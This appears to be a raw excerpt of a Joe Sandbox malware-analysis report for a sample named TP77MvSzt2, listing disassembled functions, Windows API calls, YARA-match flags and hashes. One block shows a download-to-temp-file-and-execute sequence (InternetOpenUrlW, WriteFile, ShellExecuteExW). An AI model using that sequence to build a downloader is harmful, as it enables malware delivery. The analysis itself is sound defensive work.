                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
                                                                                  • _free.LIBCMT ref: 0043A651
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 0043A673
                                                                                  • _free.LIBCMT ref: 0043A688
                                                                                  • _free.LIBCMT ref: 0043A693
                                                                                  • _free.LIBCMT ref: 0043A6B5
                                                                                  • _free.LIBCMT ref: 0043A6C8
                                                                                  • _free.LIBCMT ref: 0043A6D6
                                                                                  • _free.LIBCMT ref: 0043A6E1
                                                                                  • _free.LIBCMT ref: 0043A719
                                                                                  • _free.LIBCMT ref: 0043A720
                                                                                  • _free.LIBCMT ref: 0043A73D
                                                                                  • _free.LIBCMT ref: 0043A755
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID:
                                                                                  • API String ID: 161543041-0
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0486A8C3
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C2F
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C41
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C53
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C65
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C77
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C89
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869C9B
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CAD
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CBF
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CD1
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CE3
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869CF5
                                                                                    • Part of subcall function 04869C12: _free.LIBCMT ref: 04869D07
                                                                                  • _free.LIBCMT ref: 0486A8B8
                                                                                    • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
                                                                                    • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
                                                                                  • _free.LIBCMT ref: 0486A8DA
                                                                                  • _free.LIBCMT ref: 0486A8EF
                                                                                  • _free.LIBCMT ref: 0486A8FA
                                                                                  • _free.LIBCMT ref: 0486A91C
                                                                                  • _free.LIBCMT ref: 0486A92F
                                                                                  • _free.LIBCMT ref: 0486A93D
                                                                                  • _free.LIBCMT ref: 0486A948
                                                                                  • _free.LIBCMT ref: 0486A980
                                                                                  • _free.LIBCMT ref: 0486A987
                                                                                  • _free.LIBCMT ref: 0486A9A4
                                                                                  • _free.LIBCMT ref: 0486A9BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID:
                                                                                  • API String ID: 161543041-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 04832C9E
                                                                                  • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 04832CB4
                                                                                  • GetTempPathW.KERNEL32(00000105,?), ref: 04832CD0
                                                                                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 04832CE6
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 04832D1F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04832D5B
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 04832D78
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 04832DEF
                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 04832E04
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                  • String ID: <
                                                                                  • API String ID: 838076374-4251816714
                                                                                  APIs
                                                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                                                    • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                  • String ID: 11@$pContext$switchState
                                                                                  • API String ID: 3151764488-3851367110
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,0484F248,00000004,04847DA7,00000004,04848089), ref: 0484EF19
                                                                                  • GetLastError.KERNEL32(?,0484F248,00000004,04847DA7,00000004,04848089,?,048487B9,?,00000008,0484802D,00000000,?,?,00000000,?), ref: 0484EF25
                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0484F248,00000004,04847DA7,00000004,04848089,?,048487B9,?,00000008,0484802D,00000000,?,?,00000000), ref: 0484EF35
                                                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0484EF4B
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF61
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF78
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF8F
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EFA6
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EFBD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                  • String ID: advapi32.dll
                                                                                  • API String ID: 2340687224-4050573280
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,0484F248,00000004,04847DA7,00000004,04848089), ref: 0484EF19
                                                                                  • GetLastError.KERNEL32(?,0484F248,00000004,04847DA7,00000004,04848089,?,048487B9,?,00000008,0484802D,00000000,?,?,00000000,?), ref: 0484EF25
                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0484F248,00000004,04847DA7,00000004,04848089,?,048487B9,?,00000008,0484802D,00000000,?,?,00000000), ref: 0484EF35
                                                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0484EF4B
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF61
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF78
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EF8F
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EFA6
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0484EFBD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                  • String ID: advapi32.dll
                                                                                  • API String ID: 2340687224-4050573280
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0484672B), ref: 048424D6
                                                                                  • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 048424E4
                                                                                  • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 048424F2
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0484672B), ref: 04842520
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 04842527
                                                                                  • GetLastError.KERNEL32(?,?,?,0484672B), ref: 04842542
                                                                                  • GetLastError.KERNEL32(?,?,?,0484672B), ref: 0484254E
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 04842564
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04842572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                  • String ID: kernel32.dll
                                                                                  • API String ID: 4179531150-1793498882
                                                                                  • Opcode ID: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                                                  • Instruction ID: 9847fb47ec0d2e382ea3d5c0f15c50e86aae0a7f2f2b3dbebf561a43f0ec4e3c
                                                                                  • Opcode Fuzzy Hash: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                                                  • Instruction Fuzzy Hash: 301125759043187FF710BB78AC88A3B7BACAD81A877110E66F801D31A1EF78E540866D
                                                                                  APIs
                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: DecodePointer
                                                                                  • String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
                                                                                  • API String ID: 3527080286-2461957735
                                                                                  • Opcode ID: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                                                  • Instruction ID: 47f9428d28cfd6d6d0fcc487ca1ad96a5e838d4e1f3ed62f9574ed722bc2da70
                                                                                  • Opcode Fuzzy Hash: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                                                  • Instruction Fuzzy Hash: 1A51A07490160ADBCF14DFA8E6481AEBBB0FF0D300F6551A7E480AB255C7798D29CB1E
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00419799
                                                                                  • SafeRWList.LIBCONCRT ref: 004197B8
                                                                                    • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
                                                                                    • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
                                                                                  • GetLastError.KERNEL32 ref: 004197D9
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                  • String ID: eventObject
                                                                                  • API String ID: 1999291547-1680012138
                                                                                  • Opcode ID: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                                                  • Instruction ID: 74ee1ce6077461ea63ae9e00130f3aceb1e9566028cac9141ddd6988e3fa2b51
                                                                                  • Opcode Fuzzy Hash: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                                                  • Instruction Fuzzy Hash: 6511A075600105EACB14EFA5CC49FEF77B8AF00701F20012BF42AE21D1DB789E85866D
                                                                                  APIs
                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415269
                                                                                    • Part of subcall function 00414C7A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C8E
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415292
                                                                                    • Part of subcall function 004130F4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00413110
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004152B9
                                                                                  • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415173
                                                                                    • Part of subcall function 00413158: __EH_prolog3_GS.LIBCMT ref: 0041315F
                                                                                    • Part of subcall function 00413158: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041316E
                                                                                    • Part of subcall function 00413158: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413175
                                                                                    • Part of subcall function 00413158: GetCurrentThread.KERNEL32 ref: 0041319D
                                                                                    • Part of subcall function 00413158: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 004131A7
                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415194
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151CB
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0041520E
                                                                                  • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00415301
                                                                                  • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415325
                                                                                  • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415332
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                  • String ID:
                                                                                  • API String ID: 64082781-0
                                                                                  • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                  • Instruction ID: 3c4a00c01101e3417d492a63c26e06d94b1efbede92b5aee1480a2ddfdefe69c
                                                                                  • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                  • Instruction Fuzzy Hash: A3618D71A00715DFDB18CFA5E8926EEB7B1FB84316F24806ED45697252C738A981CF4C
                                                                                  APIs
                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 048454D0
                                                                                    • Part of subcall function 04844EE1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 04844EF5
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 048454F9
                                                                                    • Part of subcall function 0484335B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 04843377
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 04845520
                                                                                  • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 048453DA
                                                                                    • Part of subcall function 048433BF: __EH_prolog3_GS.LIBCMT ref: 048433C6
                                                                                    • Part of subcall function 048433BF: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 048433D5
                                                                                    • Part of subcall function 048433BF: GetProcessAffinityMask.KERNEL32(00000000), ref: 048433DC
                                                                                    • Part of subcall function 048433BF: GetCurrentThread.KERNEL32 ref: 04843404
                                                                                    • Part of subcall function 048433BF: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0484340E
                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 048453FB
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 04845432
                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 04845475
                                                                                  • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 04845568
                                                                                  • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0484558C
                                                                                  • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 04845599
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                  • String ID:
                                                                                  • API String ID: 64082781-0
                                                                                  • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                  • Instruction ID: 9439a16b31e8b5ac773a35d3647d61abd852967440a9b4d4d7da6e4dcddd691f
                                                                                  • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                  • Instruction Fuzzy Hash: 9B619A71A00318AFDB18CFA8E8D166DB7B2FF84316F248A2DD546DB642D771B940CB45
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00431E1A
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 00431E26
                                                                                  • _free.LIBCMT ref: 00431E31
                                                                                  • _free.LIBCMT ref: 00431E3C
                                                                                  • _free.LIBCMT ref: 00431E47
                                                                                  • _free.LIBCMT ref: 00431E52
                                                                                  • _free.LIBCMT ref: 00431E5D
                                                                                  • _free.LIBCMT ref: 00431E68
                                                                                  • _free.LIBCMT ref: 00431E73
                                                                                  • _free.LIBCMT ref: 00431E81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                  • Instruction ID: 37ceee84360c9df2d19b7be330e975e9230a82d8295317da332a0d8bba7d8220
                                                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                  • Instruction Fuzzy Hash: 9111A476100508AFCB02EF56C852CD93BA5EF18355F1190AAFA088F232DA76EF519F84
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 04862081
                                                                                    • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
                                                                                    • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
                                                                                  • _free.LIBCMT ref: 0486208D
                                                                                  • _free.LIBCMT ref: 04862098
                                                                                  • _free.LIBCMT ref: 048620A3
                                                                                  • _free.LIBCMT ref: 048620AE
                                                                                  • _free.LIBCMT ref: 048620B9
                                                                                  • _free.LIBCMT ref: 048620C4
                                                                                  • _free.LIBCMT ref: 048620CF
                                                                                  • _free.LIBCMT ref: 048620DA
                                                                                  • _free.LIBCMT ref: 048620E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                  • Instruction ID: 9a3217459f1d2d0a2e5fe5734f02ec91f7c425252d1a5e57e892dd4e7685436b
                                                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                  • Instruction Fuzzy Hash: C811B9B5500148BFDB81EF5CC852CD93BA6EF04394B1146A9FD0A8F221D671EE60EB81
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe
                                                                                  • String ID: f(@$f(@
                                                                                  • API String ID: 4189289331-2391611762
                                                                                  • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                  • Instruction ID: 3bb8b72b3fcb016b6809a9d2676edbb9e39e2dfdcc2cff5661f77b8cf8a8e7b7
                                                                                  • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                  • Instruction Fuzzy Hash: 8F511B32600215EBDB249B5BAC41EAF77ADEF49325F90425FF815D6282DB3DD900867C
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0042871B
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004287B1
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00428831
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: 11@$@fB$csm
                                                                                  • API String ID: 1170836740-1464837749
                                                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                  • Instruction ID: 85514cbf9916709cbd5a6cdf55cb31cf47df2c82886cb460035ca25a3a5e93b8
                                                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                  • Instruction Fuzzy Hash: E6411634B012289BCF00DF29DC41A9E7BB1AF80328F64815FE8146B392DB399D11CB99
                                                                                  APIs
                                                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 04854AED
                                                                                    • Part of subcall function 04854DBC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,04854820), ref: 04854DCC
                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 04854B02
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 04854B11
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04854B1F
                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 04854B95
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 04854BD5
• __CxxThrowException@8.LIBVCRUNTIME ref: 04854BE3
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
• String ID: 11@
• API String ID: 3151764488-1785270423
• Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
• Instruction ID: be59acdd074efd8f4beda5c8a6886d17a8a269501d1924f548586e9857cc2da0
• Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
• Instruction Fuzzy Hash: 8331F435A00214ABCF05EFA8C880B6D73B5FF44A14F204E69ED11E7365EBB0FA45C691
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction ID: 0a0d5c2835e4b70d8d752903f8d1583d000f5bdb626ce7eb4a4371798e67b260
• Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
